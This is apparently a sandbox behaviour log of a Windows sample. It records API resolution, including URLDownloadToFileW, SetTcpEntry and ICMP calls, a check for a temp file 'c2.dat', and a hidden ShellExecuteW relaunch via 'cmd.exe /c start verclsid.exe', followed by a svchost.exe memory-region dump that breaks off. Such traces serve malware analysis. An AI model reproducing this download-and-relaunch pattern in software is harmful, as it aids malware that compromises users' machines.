[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0521.111] GetProcAddress (hModule=0x7fefc970000, lpProcName="getpeername") returned 0x7feffcfe450
[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0521.111] GetProcAddress (hModule=0x7fefc970000, lpProcName="getsockname") returned 0x7feffcd9480
[0521.111] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0521.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0521.125] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1f68d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0521.125] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="ShellExecuteW") returned 0x7fefe50983c
[0521.125] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7feffda0000
[0525.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0525.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0525.999] GetProcAddress (hModule=0x7feffda0000, lpProcName="URLDownloadToFileW") returned 0x7feffe395e4
[0526.000] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe4f0000
[0526.000] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7fefe210000
[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0526.000] GetProcAddress (hModule=0x7fefe210000, lpProcName="StrRetToStrW") returned 0x7fefe221078
[0526.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe518660
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1f68d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe57a274
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1f68d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0526.001] GetProcAddress (hModule=0x7fefe4f0000, lpProcName="SHParseDisplayName") returned 0x7fefe574570
[0526.001] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feff780000
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.001] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0526.001] GetProcAddress (hModule=0x7feff780000, lpProcName="CoInitialize") returned 0x7feff79a51c
[0526.003] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb670000
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="GetTcpTable") returned 0x7fefb6813ac
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="SetTcpEntry") returned 0x7fefb682fb0
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1f68d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCreateFile") returned 0x7fefb678250
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1f68d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0526.008] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpCloseHandle") returned 0x7fefb677cc0
[0526.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0526.009] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1f68d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0526.009] GetProcAddress (hModule=0x7fefb670000, lpProcName="IcmpSendEcho") returned 0x7fefb678340
[0526.009] DisableThreadLibraryCalls (hLibModule=0x1c30000) returned 1
[0526.009] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0526.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0xecb40, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0535.376] DllGetClassObject (in: rclsid=0x2e7110*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7feff906cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xee810 | out: ppv=0xee810*=0x0) returned 0x0
[0535.376] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0535.380] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0535.381] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0xee3e6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0535.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0535.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1f3d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0535.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0xed300, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0535.383] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0xee390 | out: lpFindFileData=0xee390*(dwFileAttributes=0x2e6a30, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2e6a30, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1c436fd, nFileSizeHigh=0x0, nFileSizeLow=0xee3b0, dwReserved0=0x0, dwReserved1=0xee3d8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0535.386] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit", lpDirectory=0x0, nShowCmd=0) returned 0x2a
Thread:
id = 220
os_tid = 0x654
Thread:
id = 221
os_tid = 0x27c
Thread:
id = 222
os_tid = 0x594
Process:
id = "27"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7474000"
os_pid = "0x370"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "25"
os_parent_pid = "0x1d0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000df09" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 4017
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4018
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 4019
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4020
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4021
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4022
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 4023
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4024
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 4025
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 4026
start_va = 0xa0000
end_va = 0xa0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 4027
start_va = 0xb0000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 4028
start_va = 0x130000
end_va = 0x196fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4029
start_va = 0x1a0000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4030
start_va = 0x2a0000
end_va = 0x2aafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 4031
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 4032
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4033
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 4034
start_va = 0x6d0000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 4035
start_va = 0x790000
end_va = 0x79cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4036
start_va = 0x7a0000
end_va = 0x7a3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 4037
start_va = 0x7b0000
end_va = 0x7b9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 4038
start_va = 0x7c0000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 4039
start_va = 0x7d0000
end_va = 0x7d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 4040
start_va = 0x7e0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 4041
start_va = 0x7f0000
end_va = 0x86ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 4042
start_va = 0x870000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000870000"
filename = ""
Region:
id = 4043
start_va = 0x8f0000
end_va = 0x96ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 4044
start_va = 0x970000
end_va = 0x973fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4045
start_va = 0x980000
end_va = 0x981fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000980000"
filename = ""
Region:
id = 4046
start_va = 0x990000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4047
start_va = 0x9c0000
end_va = 0x9c3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4048
start_va = 0x9d0000
end_va = 0x9ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4049
start_va = 0x9e0000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 4050
start_va = 0xa90000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 4051
start_va = 0xb10000
end_va = 0xddefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4052
start_va = 0xe40000
end_va = 0xebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e40000"
filename = ""
Region:
id = 4053
start_va = 0xec0000
end_va = 0xf25fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4054
start_va = 0xf30000
end_va = 0xfaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f30000"
filename = ""
Region:
id = 4055
start_va = 0x1020000
end_va = 0x109ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 4056
start_va = 0x1130000
end_va = 0x11affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001130000"
filename = ""
Region:
id = 4057
start_va = 0x11e0000
end_va = 0x125ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011e0000"
filename = ""
Region:
id = 4058
start_va = 0x12f0000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012f0000"
filename = ""
Region:
id = 4059
start_va = 0x13a0000
end_va = 0x141ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013a0000"
filename = ""
Region:
id = 4060
start_va = 0x1470000
end_va = 0x14effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 4061
start_va = 0x1510000
end_va = 0x158ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 4062
start_va = 0x1590000
end_va = 0x160ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001590000"
filename = ""
Region:
id = 4063
start_va = 0x1630000
end_va = 0x16affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001630000"
filename = ""
Region:
id = 4064
start_va = 0x16e0000
end_va = 0x175ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016e0000"
filename = ""
Region:
id = 4065
start_va = 0x17b0000
end_va = 0x182ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017b0000"
filename = ""
Region:
id = 4066
start_va = 0x1830000
end_va = 0x18affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001830000"
filename = ""
Region:
id = 4067
start_va = 0x1900000
end_va = 0x197ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 4068
start_va = 0x19a0000
end_va = 0x1a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019a0000"
filename = ""
Region:
id = 4069
start_va = 0x1a30000
end_va = 0x1aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a30000"
filename = ""
Region:
id = 4070
start_va = 0x1ab0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ab0000"
filename = ""
Region:
id = 4071
start_va = 0x1bb0000
end_va = 0x1caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 4072
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4073
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4074
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4075
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4076
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4077
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4078
start_va = 0xff3f0000
end_va = 0xff3fafff
monitored = 0
entry_point = 0xff3f246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 4079
start_va = 0x7fefab50000
end_va = 0x7fefab58fff
monitored = 0
entry_point = 0x7fefab511a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 4080
start_va = 0x7fefad60000
end_va = 0x7fefadd6fff
monitored = 0
entry_point = 0x7fefad6afd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 4081
start_va = 0x7fefade0000
end_va = 0x7fefadeefff
monitored = 0
entry_point = 0x7fefade7e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 4082
start_va = 0x7fefadf0000
end_va = 0x7fefadf9fff
monitored = 0
entry_point = 0x7fefadf260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 4083
start_va = 0x7fefae00000
end_va = 0x7fefaf11fff
monitored = 0
entry_point = 0x7fefae1f354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 4084
start_va = 0x7fefaf20000
